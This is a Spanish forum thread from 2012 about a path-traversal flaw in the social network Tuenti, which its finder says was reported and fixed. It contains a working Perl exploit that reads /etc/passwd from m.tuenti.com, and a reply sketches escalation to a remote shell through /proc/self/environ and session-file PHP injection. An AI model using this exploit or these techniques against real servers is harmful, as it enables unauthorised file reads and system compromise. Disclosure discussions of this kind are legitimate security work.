Fallo de seguridad en tuenti.

Iniciado por WarGhost, 30 Mayo 2012, 18:17 PM

0 Miembros y 1 Visitante están viendo este tema.

WarGhost

Buenos, no se si alguien sabe la dirección de correo electrónico que utiliza la red social tuenti para reportar fallos de seguridad o bien si es como facebook que tiene un sistema de reportes web.

Un saludo y gracias! y si alguien tiene alguna experiencia reportado fallos de seguridad en esta red social... que me comente su experiencia.

Gracias un saludo
¿Qué culpa tengo yo de tener la sangre roja y el corazón a la izquierda?

el-brujo


WarGhost

Muchas gracias el-brujo, la verdad es como puso lipman en su hilo, me gustaría publicarlo pero no sin antes esperar como mínimo a que este arreglado.

Ahora contactare con dimitrix y que me cuente sus experiencias, que parece que tiene muchas jajaja
¿Qué culpa tengo yo de tener la sangre roja y el corazón a la izquierda?

WarGhost

#3
Bueno le pase el error a diminitrix y el contacto con el encargado de seguridad, tambien se lo envié chica de elpais tecnología y ella contacto con tuenti, a las dos horas de hacerlo ya lo arreglaron.

El fallo era un path traversal que te permitía poder leer cualquier fichero del sistema(que tenga permisos claro).

Este era el exploit que utlizaba:

#!/usr/bin/perl
use IO::Socket::INET;

$host = "m.tuenti.com";
$attack = "../../../../../../../etc/passwd";

my $sock = IO::Socket::INET->new( PeerAddr => $host,
PeerPort => 'http(80)',
Proto => 'tcp');

print $sock $request . "GET /?m=" . $attack ."%00 HTTP/1.1\r\n"
. "Host: " . $host ."\r\n"
. "Connection: Close\r\n\r\n";

while($line = <$sock>) {  print $line;  }

¿Qué culpa tengo yo de tener la sangre roja y el corazón a la izquierda?

tremolero

Oye warghost, una pregunta, como llegaste hasta la vulnerabilidad?

Y como de grave es esta vulnerabilidad? porque te permitia leer archivos que tuviera permisos, pero perfectamente podrias no ver nada, no?


Saludos...

WarGhost

Pues encontré la vulnerabilidad probando, estaba analizando como estaba montada tuenti y bueno salio eso.

La gravedad de este tipo de vulnerabilidades es de las mas altas ya que si no es por un sitio puede ser por otro, se podría llegar a inyectar código php desde el user-agent y /proc/self/environ, también desde las sesiones e inyectar una shell remota, mirar archivos de configuración etc...
La verdad una vez encontré la vulnerabilidad simplemente la quise reportar, porque ya sabéis como son estas empresas u.u.

En fin... que no venden de que tienen nuestros datos protegidos, pero vamos cuento chino :S.
¿Qué culpa tengo yo de tener la sangre roja y el corazón a la izquierda?

tremolero

ay va!, xD pues es mas grave esa vulnerabilidad de lo que yo pensaba.
Pues si, hicistes bien en reportar, que seguro que llamas para decir que has encontrado un fallo y te meten en la carcel xD

buff... llevo mucho tiempo perdido, me voy a tener que poner manos a la obra ^^.

Por cierto, no te pueden considerar una amenaza al analizar como ellos tienen montado tuenti? mas que nada para prevenir ante cualquier problema ^^.

Saludos...